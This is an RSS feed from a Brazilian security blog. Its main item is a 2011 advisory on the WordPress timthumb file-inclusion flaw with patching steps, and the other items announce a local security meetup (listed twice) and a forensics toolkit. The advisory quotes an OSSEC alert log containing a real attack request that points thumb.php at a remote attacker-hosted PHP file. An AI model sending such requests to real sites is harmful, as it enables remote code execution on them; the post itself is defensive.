<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"><channel><title>Alexandro Silva's RSS feed</title><link>http://softwarelivre.org/alexos</link><description>Alexandro Silva's content published at Software Livre Brasil</description><item><title>WordPress: Corrigindo vulnerabilidade no timthumb</title><description>&amp;lt;p&amp;gt;&amp;lt;a href=&amp;quot;http://blog.alexos.com.br/wp-content/uploads/2011/03/internetera-net-wordpress-eye-wallpaper.jpg&amp;quot;&amp;gt;&amp;lt;img class=&amp;quot;alignright size-medium wp-image-2310&amp;quot; title=&amp;quot;internetera-net-wordpress-eye-wallpaper&amp;quot; src=&amp;quot;http://blog.alexos.com.br/wp-content/uploads/2011/03/internetera-net-wordpress-eye-wallpaper-300x225.jpg&amp;quot; height=&amp;quot;225&amp;quot; alt=&amp;quot;&amp;quot; width=&amp;quot;300&amp;quot; /&amp;gt;&amp;lt;/a&amp;gt;Sugiu uma vulnerabilidade no WordPress classificada como alta, a falha foi encontrada no script timthumb presente na maioria dos templates e permite a inclusão de arquivos maliciosos.&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;O Ossec alerta e bloqueia as tentativas de ataque com o objetivo de explorar está vulnerabilidade se a active-response foi habilitada.&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;&amp;lt;p&amp;gt;
OSSEC HIDS Notification.&amp;lt;br /&amp;gt;
2011 Nov 11 03:29:38&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Received From: acme-&amp;gt;/var/log/httpd/www.acme.com-access_log&amp;lt;br /&amp;gt;
Rule: 31151 fired (level 10) -&amp;gt; &amp;amp;#8220;Mutiple web server 400 error codes from same source ip.&amp;amp;#8221;&amp;lt;br /&amp;gt;
Portion of the log(s):&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;xx.xxx.xxx.xxx &amp;amp;#8211; - [11/Nov/2011:04:29:25 -0200] &amp;amp;#8220;GET //wp-content/themes/Quadro/thumb.php?src=http://picasa.com.xpl.be/yahoo.php HTTP/1.1&amp;amp;#8243; 404 232 &amp;amp;#8220;-&amp;amp;#8221; &amp;amp;#8220;Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4&amp;amp;#8243;
&amp;lt;/p&amp;gt;&amp;lt;/blockquote&amp;gt;
&amp;lt;p&amp;gt;Para corrigi-la é necessário executar os seguintes passos:&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;1 . Localizar se o arquivo timthumb.php, thumb.php ou similar que encontra-se no diretório template localizado em &amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;/wp-content/themes&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;2. Em caso afirmativo substituir todo o código pela nova versão[1]&amp;lt;br /&amp;gt;
 &amp;lt;br /&amp;gt;
[1] code.google.com/p/timthumb/source/browse/trunk/timthumb.php&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;strong&amp;gt;Maiores informações:&amp;lt;/strong&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;blog.ptservidor.pt/seguranca/alerta-de-seguranca-vulnerabilidade-timthumb/&amp;lt;br /&amp;gt;
blog.spiderlabs.com/2011/11/wordpress-timthumb-attacks-rising.html&amp;lt;br /&amp;gt;
markmaunder.com/2011/08/01/zero-day-vulnerability-in-many-wordpress-themes/&amp;lt;/p&amp;gt;
&amp;lt;div&amp;gt;&amp;lt;h3&amp;gt;See:&amp;lt;/h3&amp;gt;&amp;lt;ul&amp;gt;&amp;lt;li&amp;gt;&amp;lt;a href=&amp;quot;http://blog.alexos.com.br/?p=2302&amp;amp;amp;#38;lang=pt-br&amp;quot; class=&amp;quot;crp_title&amp;quot;&amp;gt;Usando o http-wp-plugins do Nmap para detectar plugins do WordPress&amp;lt;/a&amp;gt;&amp;lt;/li&amp;gt;&amp;lt;li&amp;gt;&amp;lt;a href=&amp;quot;http://blog.alexos.com.br/?p=2180&amp;amp;amp;#38;lang=pt-br&amp;quot; class=&amp;quot;crp_title&amp;quot;&amp;gt;Nessus Viewer&amp;lt;/a&amp;gt;&amp;lt;/li&amp;gt;&amp;lt;li&amp;gt;&amp;lt;a href=&amp;quot;http://blog.alexos.com.br/?p=2770&amp;amp;amp;#38;lang=pt-br&amp;quot; class=&amp;quot;crp_title&amp;quot;&amp;gt;Conheça o projeto Muffin&amp;lt;/a&amp;gt;&amp;lt;/li&amp;gt;&amp;lt;li&amp;gt;&amp;lt;a href=&amp;quot;http://blog.alexos.com.br/?p=2650&amp;amp;amp;#38;lang=pt-br&amp;quot; class=&amp;quot;crp_title&amp;quot;&amp;gt;Ossec HIDS &amp;amp;#8211; Bloqueando o ZmEu bot e outros Web scanners&amp;lt;/a&amp;gt;&amp;lt;/li&amp;gt;&amp;lt;li&amp;gt;&amp;lt;a href=&amp;quot;http://blog.alexos.com.br/?p=2555&amp;amp;amp;#38;lang=pt-br&amp;quot; class=&amp;quot;crp_title&amp;quot;&amp;gt;Eventos Segurança da Informação &amp;amp;#8211; 2o. semestre 2011&amp;lt;/a&amp;gt;&amp;lt;/li&amp;gt;&amp;lt;/ul&amp;gt;&amp;lt;/div&amp;gt;</description><pubDate>Fri, 11 Nov 2011 14:38:27 -0200</pubDate><link>http://softwarelivre.org/alexos/blog/wordpress-corrigindo-vulnerabilidade-no-timthumb</link><guid>http://softwarelivre.org/alexos/blog/wordpress-corrigindo-vulnerabilidade-no-timthumb</guid></item><item><title>2o. SSASec Day – Encontro SegInfo de Salvador</title><description>&lt;p&gt;&lt;img src="https://twimg0-a.akamaihd.net/profile_images/1347889648/ssasec_2.jpg" alt="SSASec" /&gt;&lt;br /&gt;
O SSASec é um encontro mensal e informal de profissionais, estudantes, pesquisadores, hackers e interessados em geral por segurança da informação, visando a troca de experiência, networking e como uma forma de nos mantermos atualizados sobre os assuntos ligados a área.&lt;/p&gt;
&lt;p&gt;Nós estamos promovendo um mini-evento que ocorrerá dia 12/11 ( sábado ) das 09 às 12 no auditório da Faculdade Rui Barbosa localizada no Rio Vermelho. &lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Agenda:&lt;/strong&gt;&lt;br /&gt;
Dia: 12/11 ( sábado )&lt;br /&gt;
Horário: 09 às 12&lt;br /&gt;
Local: Faculdade Rui Barbosa &amp;#8211; Rio Vermelho&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Palestras&lt;/strong&gt;&lt;br /&gt;
Segurança da Informação &amp;#8211; Por onde começar? &amp;#8211; Alexandro Silva ( DCLabs )&lt;br /&gt;
Segurança de infrastrutura &amp;#8211; DNSSec &amp;#8211; Ítalo Valcy ( POP/UFBA )&lt;br /&gt;
Por trás das pesquisas em Segurança da Informação &amp;#8211; Rick ( Corelan ) e AndersonC0d3 ( Hack&amp;#8217;n Roll )&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Não haverá inscrição, é só ir e se divertir!!&lt;/strong&gt;&lt;/p&gt;
&lt;div&gt;&lt;h3&gt;See:&lt;/h3&gt;&lt;ul&gt;&lt;li&gt;&lt;a href="http://blog.alexos.com.br/?p=2425&amp;amp;#38;lang=pt-br" class="crp_title"&gt;SSASec &amp;#8211; Encontro CitySec da cidade de Salvador&lt;/a&gt;&lt;/li&gt;&lt;li&gt;&lt;a href="http://blog.alexos.com.br/?p=2539&amp;amp;#38;lang=pt-br" class="crp_title"&gt;Como foi o 1o. SSASec&lt;/a&gt;&lt;/li&gt;&lt;li&gt;&lt;a href="http://blog.alexos.com.br/?p=331&amp;amp;#38;lang=pt-br" class="crp_title"&gt;8º Semana de Engenharia da Universidade Unirp&lt;/a&gt;&lt;/li&gt;&lt;li&gt;&lt;a href="http://blog.alexos.com.br/?p=1833&amp;amp;#38;lang=pt-br" class="crp_title"&gt;H2HC &amp;#8211; Chamada de Trabalhos ( Call for Papers )&lt;/a&gt;&lt;/li&gt;&lt;li&gt;&lt;a href="http://blog.alexos.com.br/?p=1677&amp;amp;#38;lang=pt-br" class="crp_title"&gt;FLISOL 2010 Salvador: Grade de Palestras&lt;/a&gt;&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt;</description><pubDate>Thu, 29 Sep 2011 07:56:14 -0300</pubDate><link>http://softwarelivre.org/alexos/blog/2o.-ssasec-day-%E2%80%93-encontro-seginfo-de-salvador</link><guid>http://softwarelivre.org/alexos/blog/2o.-ssasec-day-%E2%80%93-encontro-seginfo-de-salvador</guid></item><item><title>2o. SSASec Day – Encontro SegInfo de Salvador</title><description>&lt;p&gt;&lt;img src="https://twimg0-a.akamaihd.net/profile_images/1347889648/ssasec_2.jpg" alt="SSASec" /&gt;&lt;br /&gt;
O SSASec é um encontro mensal e informal de profissionais, estudantes, pesquisadores, hackers e interessados em geral por segurança da informação, visando a troca de experiência, networking e como uma forma de nos mantermos atualizados sobre os assuntos ligados a área.&lt;/p&gt;
&lt;p&gt;Nós estamos promovendo um mini-evento que ocorrerá dia 12/11 ( sábado ) das 09 às 12 no auditório da Faculdade Rui Barbosa localizada no Rio Vermelho. &lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Agenda:&lt;/strong&gt;&lt;br /&gt;
Dia: 12/11 ( sábado )&lt;br /&gt;
Horário: 09 às 12&lt;br /&gt;
Local: Faculdade Rui Barbosa &amp;#8211; Rio Vermelho&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Palestras&lt;/strong&gt;&lt;br /&gt;
Segurança da Informação &amp;#8211; Por onde começar? &amp;#8211; Alexandro Silva ( DCLabs )&lt;br /&gt;
Segurança de infrastrutura &amp;#8211; DNSSec &amp;#8211; Ítalo Valcy ( POP/UFBA )&lt;br /&gt;
Por trás das pesquisas em Segurança da Informação &amp;#8211; Rick ( Corelan ) e AndersonC0d3 ( Hack&amp;#8217;n Roll )&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Não haverá inscrição, é só ir e se divertir!!&lt;/strong&gt;&lt;/p&gt;
&lt;div&gt;&lt;h3&gt;See:&lt;/h3&gt;&lt;ul&gt;&lt;li&gt;&lt;a href="http://blog.alexos.com.br/?p=2425&amp;amp;#38;lang=pt-br" class="crp_title"&gt;SSASec &amp;#8211; Encontro CitySec da cidade de Salvador&lt;/a&gt;&lt;/li&gt;&lt;li&gt;&lt;a href="http://blog.alexos.com.br/?p=2539&amp;amp;#38;lang=pt-br" class="crp_title"&gt;Como foi o 1o. SSASec&lt;/a&gt;&lt;/li&gt;&lt;li&gt;&lt;a href="http://blog.alexos.com.br/?p=331&amp;amp;#38;lang=pt-br" class="crp_title"&gt;8º Semana de Engenharia da Universidade Unirp&lt;/a&gt;&lt;/li&gt;&lt;li&gt;&lt;a href="http://blog.alexos.com.br/?p=1833&amp;amp;#38;lang=pt-br" class="crp_title"&gt;H2HC &amp;#8211; Chamada de Trabalhos ( Call for Papers )&lt;/a&gt;&lt;/li&gt;&lt;li&gt;&lt;a href="http://blog.alexos.com.br/?p=1677&amp;amp;#38;lang=pt-br" class="crp_title"&gt;FLISOL 2010 Salvador: Grade de Palestras&lt;/a&gt;&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt;</description><pubDate>Thu, 29 Sep 2011 07:56:14 -0300</pubDate><link>http://softwarelivre.org/alexos/blog/2o.-ssasec-day-%E2%80%93-encontro-seginfo-de-salvador</link><guid>http://softwarelivre.org/alexos/blog/2o.-ssasec-day-%E2%80%93-encontro-seginfo-de-salvador</guid></item><item><title>1o. Encontro SegInfo de Salvador – SSASec Day</title><description>&lt;p&gt;&lt;img src="https://twimg0-a.akamaihd.net/profile_images/1347889648/ssasec_2.jpg" alt="SSASec" /&gt;&lt;br /&gt;
O SSASec é um encontro mensal e informal de profissionais, estudantes, pesquisadores, hackers e interessados em geral por segurança da informação, visando a troca de experiência, networking e como uma forma de nos mantermos atualizados sobre os assuntos ligados a área.&lt;/p&gt;
&lt;p&gt;Nós estamos promovendo um mini-evento que ocorrerá dia 12/11 ( sábado ) das 09 às 12 no auditório da Faculdade Rui Barbosa localizada no Rio Vermelho. &lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Agenda:&lt;/strong&gt;&lt;br /&gt;
Dia: 12/11 ( sábado )&lt;br /&gt;
Horário: 09 às 12&lt;br /&gt;
Local: Faculdade Rui Barbosa &amp;#8211; Rio Vermelho&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Palestras&lt;/strong&gt;&lt;br /&gt;
Segurança da Informação &amp;#8211; Por onde começar? &amp;#8211; Alexandro Silva ( DCLabs )&lt;br /&gt;
Segurança de infrastrutura &amp;#8211; DNSSec &amp;#8211; Ítalo Valcy ( POP/UFBA )&lt;br /&gt;
Por trás das pesquisas em Segurança da Informação &amp;#8211; Rick ( Corelan ) e AndersonC0d3 ( Hack&amp;#8217;n Roll )&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Não haverá inscrição, é só ir e se divertir!!&lt;/strong&gt;&lt;/p&gt;
&lt;div&gt;&lt;h3&gt;See:&lt;/h3&gt;&lt;ul&gt;&lt;li&gt;&lt;a href="http://blog.alexos.com.br/?p=2425&amp;amp;#38;lang=pt-br" class="crp_title"&gt;SSASec &amp;#8211; Encontro CitySec da cidade de Salvador&lt;/a&gt;&lt;/li&gt;&lt;li&gt;&lt;a href="http://blog.alexos.com.br/?p=2539&amp;amp;#38;lang=pt-br" class="crp_title"&gt;Como foi o 1o. SSASec&lt;/a&gt;&lt;/li&gt;&lt;li&gt;&lt;a href="http://blog.alexos.com.br/?p=331&amp;amp;#38;lang=pt-br" class="crp_title"&gt;8º Semana de Engenharia da Universidade Unirp&lt;/a&gt;&lt;/li&gt;&lt;li&gt;&lt;a href="http://blog.alexos.com.br/?p=1833&amp;amp;#38;lang=pt-br" class="crp_title"&gt;H2HC &amp;#8211; Chamada de Trabalhos ( Call for Papers )&lt;/a&gt;&lt;/li&gt;&lt;li&gt;&lt;a href="http://blog.alexos.com.br/?p=1677&amp;amp;#38;lang=pt-br" class="crp_title"&gt;FLISOL 2010 Salvador: Grade de Palestras&lt;/a&gt;&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt;</description><pubDate>Wed, 28 Sep 2011 23:54:47 -0300</pubDate><link>http://softwarelivre.org/alexos/blog/1o.-encontro-seginfo-de-salvador-%E2%80%93-ssasec-day</link><guid>http://softwarelivre.org/alexos/blog/1o.-encontro-seginfo-de-salvador-%E2%80%93-ssasec-day</guid></item><item><title>Conheça o projeto Muffin</title><description>&lt;p&gt;&lt;a href="http://blog.alexos.com.br/wp-content/uploads/2011/09/muffin.jpeg"&gt;&lt;img title="muffin" class="alignleft size-full wp-image-2774" src="http://blog.alexos.com.br/wp-content/uploads/2011/09/muffin.jpeg" height="198" alt="" width="255" /&gt;&lt;/a&gt;O &lt;a href="http://code.google.com/p/muffin-project/"&gt;Muffin&lt;/a&gt; é um dos projetos do grande &lt;a href="http://forcomp.blogspot.com/"&gt;Tony Rodrigues&lt;/a&gt;, ele  é um Incident Response Toolkit (Master Unit For Forensics INvestigations) e dá suporte a criação de pendrives com ferramentas que ajuda na coleta de informações voláteis.&lt;/p&gt;
&lt;p&gt;Ela está sendo desenvolvida em Pascal com SQLlite usando o Lazarus e é composto por 3 módulos:&lt;/p&gt;
&lt;blockquote&gt;&lt;p&gt;
O pendrive MUFFIN, que é a toolkit propriamente dita;&lt;br /&gt;
O MUFFIN Baker, uma ferramenta que permite configurar e gerar o pendrive MUFFIN;&lt;br /&gt;
O MUFFIN Report, que vai acessar os dados gerados/coletados pelo pendrive MUFFIN.
&lt;/p&gt;&lt;/blockquote&gt;
&lt;p&gt;&lt;strong&gt;O chamado:&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&amp;#8220;Estamos precisando de colaboradores. Se você conhece de programação e pode nos ajudar, entre em contato. Se você não conhece, mas ainda assim quer ajudar no projeto, excelente. Há muito trabalho e todos são bem vindos.&amp;#8221;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Informações:&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;http://code.google.com/p/muffin-project/&lt;/p&gt;
&lt;p&gt;https://code.google.com/p/muffin-project/source/browse/trunk/SETUP-Desenvolvimento.txt?spec=svn30&amp;#038;r=30&lt;/p&gt;
&lt;p&gt;Você que é interessado em análise forense e está disposto a dedicar um pouco do seu tempo convido a participar de um projeto promissor e empolgante com um time super gente fina.&lt;/p&gt;
&lt;p&gt;Conheça a @OctaneLabs&lt;/p&gt;
&lt;div&gt;&lt;h3&gt;See:&lt;/h3&gt;&lt;ul&gt;&lt;li&gt;&lt;a href="http://blog.alexos.com.br/?p=170&amp;amp;#38;lang=pt-br" class="crp_title"&gt;Instalando o Ubuntu Linux num pendrive&lt;/a&gt;&lt;/li&gt;&lt;li&gt;&lt;a href="http://blog.alexos.com.br/?p=1660&amp;amp;#38;lang=pt-br" class="crp_title"&gt;Projeto OWASP Broken Web Applications&lt;/a&gt;&lt;/li&gt;&lt;li&gt;&lt;a href="http://blog.alexos.com.br/?p=1035&amp;amp;#38;lang=pt-br" class="crp_title"&gt;Instalando o Debian 5.0 no Acer Aspire One ( AA1 )&lt;/a&gt;&lt;/li&gt;&lt;li&gt;&lt;a href="http://blog.alexos.com.br/?p=312&amp;amp;#38;lang=pt-br" class="crp_title"&gt;Usando o Google como ferramenta hacker &amp;#8211; Final&lt;/a&gt;&lt;/li&gt;&lt;li&gt;&lt;a href="http://blog.alexos.com.br/?p=113&amp;amp;#38;lang=pt-br" class="crp_title"&gt;Ajudar não dói!!!&lt;/a&gt;&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt;</description><pubDate>Sat, 10 Sep 2011 00:59:37 -0300</pubDate><link>http://softwarelivre.org/alexos/blog/conheca-o-projeto-muffin</link><guid>http://softwarelivre.org/alexos/blog/conheca-o-projeto-muffin</guid></item></channel></rss>
